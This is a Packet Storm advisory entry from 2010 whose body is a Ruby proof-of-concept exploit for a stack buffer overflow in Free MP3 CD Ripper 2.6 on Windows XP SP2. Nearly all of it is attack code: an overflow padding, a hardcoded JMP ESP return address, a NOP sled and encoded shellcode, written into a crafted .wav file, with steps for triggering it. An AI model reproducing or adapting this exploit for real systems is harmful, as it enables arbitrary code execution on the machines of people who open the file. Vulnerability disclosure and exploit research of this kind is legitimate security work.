Free MP3 CD Ripper 2.6 Buffer Overflow

2010-04-03T00:00:00
ID PACKETSTORM:88016
Type packetstorm
Reporter Richard Leahy
Modified 2010-04-03T00:00:00

Description

                                        
                                            `# Exploit Title: Free MP3 CD Ripper 2.6 0 day  
# Date: 30/03/2010  
# Author: Richard leahy  
# Software Link: http://www.soft32.com/Download/Free/Free_MP3_CD_Ripper/4-250188-1.html  
# Version: 2.6  
# Tested on: Windows Xp Sp2  
  
#to exploit this open up the application select file -> wav converter -> wav to mp3  
  
#use your favourite programming language and print out the contents into a text file. save the text file as a .wav  
#then open up the wav file and boom.  
  
#feel free to email me leahy_rich@hotmail.com  
  
#code  
nop = "\x90"  
  
#imagehlp  
jmp_esp = [0x76cafa32].pack('V')  
  
#shellcode opens notepad  
shellcode =  
"\xd9\xc7\xd9\x74\x24\xf4\xba\xcc\x7a\xcb\xf7\x33\xc9\xb1" +  
"\x33\x5e\x83\xee\xfc\x31\x56\x13\x03\x9a\x69\x29\x02\xde" +  
"\x66\x24\xed\x1e\x77\x57\x67\xfb\x46\x45\x13\x88\xfb\x59" +  
"\x57\xdc\xf7\x12\x35\xf4\x8c\x57\x92\xfb\x25\xdd\xc4\x32" +  
"\xb5\xd3\xc8\x98\x75\x75\xb5\xe2\xa9\x55\x84\x2d\xbc\x94" +  
"\xc1\x53\x4f\xc4\x9a\x18\xe2\xf9\xaf\x5c\x3f\xfb\x7f\xeb" +  
"\x7f\x83\xfa\x2b\x0b\x39\x04\x7b\xa4\x36\x4e\x63\xce\x11" +  
"\x6f\x92\x03\x42\x53\xdd\x28\xb1\x27\xdc\xf8\x8b\xc8\xef" +  
"\xc4\x40\xf7\xc0\xc8\x99\x3f\xe6\x32\xec\x4b\x15\xce\xf7" +  
"\x8f\x64\x14\x7d\x12\xce\xdf\x25\xf6\xef\x0c\xb3\x7d\xe3" +  
"\xf9\xb7\xda\xe7\xfc\x14\x51\x13\x74\x9b\xb6\x92\xce\xb8" +  
"\x12\xff\x95\xa1\x03\xa5\x78\xdd\x54\x01\x24\x7b\x1e\xa3" +  
"\x31\xfd\x7d\xa9\xc4\x8f\xfb\x94\xc7\x8f\x03\xb6\xaf\xbe" +  
"\x88\x59\xb7\x3e\x5b\x1e\x47\x75\xc6\x36\xc0\xd0\x92\x0b" +  
"\x8d\xe2\x48\x4f\xa8\x60\x79\x2f\x4f\x78\x08\x2a\x0b\x3e" +  
"\xe0\x46\x04\xab\x06\xf5\x25\xfe\x69\x96\xad\x64\x06\x09" +  
"\x2a\x67\xec"  
  
boom = "\x41" * 4112 + jmp_esp + nop * 10 + shellcode  
puts boom  
`